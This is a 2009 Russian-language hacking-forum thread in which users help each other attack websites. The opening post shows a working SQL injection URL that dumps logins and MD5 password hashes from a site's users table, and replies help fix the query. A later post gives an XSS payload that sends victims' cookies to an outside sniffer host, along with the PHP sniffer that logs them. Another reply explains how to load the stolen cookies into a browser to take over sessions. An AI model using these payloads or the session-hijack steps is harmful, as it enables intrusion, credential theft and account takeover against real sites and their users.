HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.07.2009, 22:15
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами: 9362947

Репутация: 1196


По умолчанию

такое дело :

вывожу записи лимитом,движок сайта сабдример.
Код:
http://сайт.ру/catalog/index.php?category=-2+union+select+1,concat(0x3a,login,pass),3,4,5,6,7+from+pmd_users+limit+1,0--
вылазит такое :
login1821165f4dcc3b5aa765d61d8327deb882cf99

меняется при изминении значения лимита только эта часть:

login1821165f4dcc3b5aa765d61d8327deb882cf99

вобщем что посоветуете?
 
Ответить с цитированием

  #2  
Старый 29.07.2009, 22:19
nub-hacker
Banned
Регистрация: 23.06.2009
Сообщений: 89
С нами: 8886744

Репутация: -67
По умолчанию

после зелёного идёт MD5
 
Ответить с цитированием

  #3  
Старый 29.07.2009, 22:24
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами: 9362947

Репутация: 1196


По умолчанию

Цитата:
Сообщение от nub-hacker  
после зелёного идёт MD5
это понятно что мд5,но эта часть во всех записях не меняется .
 
Ответить с цитированием

  #4  
Старый 29.07.2009, 22:27
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

L I G A

Меняется окончание логина? Где разделитель-то?

или concat_ws(0x3a,login,pass) или concat(login,0x3a,pass), ты уж определись
 
Ответить с цитированием

  #5  
Старый 29.07.2009, 22:30
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами: 9362947

Репутация: 1196


По умолчанию

concat_ws(0x3a,login,pass)
login363307:5f4dcc3b5aa765d61d8327deb882cf99
меняется:
login363307:5f4dcc3b5aa765d61d8327deb882cf99

Последний раз редактировалось L I G A; 29.07.2009 в 22:37..
 
Ответить с цитированием

  #6  
Старый 29.07.2009, 22:42
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
С нами: 9679872

Репутация: 347
По умолчанию

наверно таки у них пароли одинаковые) будто бы какой-то неоригинальный реггер заюзали
 
Ответить с цитированием

  #7  
Старый 29.07.2009, 22:44
nub-hacker
Banned
Регистрация: 23.06.2009
Сообщений: 89
С нами: 8886744

Репутация: -67
По умолчанию

Это чтото типа соли. токо для логина. короче лучше ставь себе этот двиг на машину и ковыряйся и разбирайся
 
Ответить с цитированием

  #8  
Старый 29.07.2009, 22:57
kiddie
Новичок
Регистрация: 15.07.2009
Сообщений: 20
С нами: 8854701

Репутация: 4
По умолчанию

Подскажите, на снифер приходят такого рода данные
com=iua=1;%20b=b;%20iua=1;%20b=b;%20holder=1;%20UH =25a4c4a69cc7f;%20I=24c6983d0fe73223;%20L=1.11
благодаря xss на уязвимом сайте , тобиш тело письма такое
Код HTML:
<script>document.location.replace('http://*****.t35.com/script.php?com='+document.cookie);</script>
код снифа :
PHP код:
<?  $query $_SERVER;  $query .= "\n";  $db="cookies.txt";  $fh=fopen ($db"a+");  fputs ($fh"$query");  fclose ($fh);  ?>
что обозначают полученные данные, тоесть что приходит...?
 
Ответить с цитированием

  #9  
Старый 30.07.2009, 03:37
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
С нами: 9798146

Репутация: 1224


По умолчанию

Цитата:
Сообщение от kiddie  
Подскажите, на снифер приходят такого рода данные
com=iua=1;%20b=b;%20iua=1;%20b=b;%20holder=1;%20UH =25a4c4a69cc7f;%20I=24c6983d0fe73223;%20L=1.11
благодаря xss на уязвимом сайте , тобиш тело письма такое
Код HTML:
<script>document.location.replace('http://*****.t35.com/script.php?com='+document.cookie);</script>
код снифа :
PHP код:
<?  $query $_SERVER;  $query .= "\n";  $db="cookies.txt";  $fh=fopen ($db"a+");  fputs ($fh"$query");  fclose ($fh);  ?>
что обозначают полученные данные, тоесть что приходит...?
это мой друг к тебе пришли куки (Ку́ки (слово не склоняется; от англ. cookie — печенье) — небольшой фрагмент данных, созданный веб-сервером и хранимый на компьютере пользователя в виде файла, который веб-клиент (обычно веб-браузер) каждый раз пересылает веб-серверу в HTTP-запросе при попытке открыть страницу соответствующего сайта. © ru.wikipedia.org)
Теперь твоя задача, подменить на полученные данные, свои. А сделать это можно следующим образом:
  1. Mozilla Firefox - при помощи плагина: Add N Edit Cookies
  2. Opera - следующей манипуляцией: "Инструменты -> Дополнительно -> Управление cookies..."
 
Ответить с цитированием

  #10  
Старый 29.07.2009, 23:10
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

$_SERVER['QUERY_STRING']
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.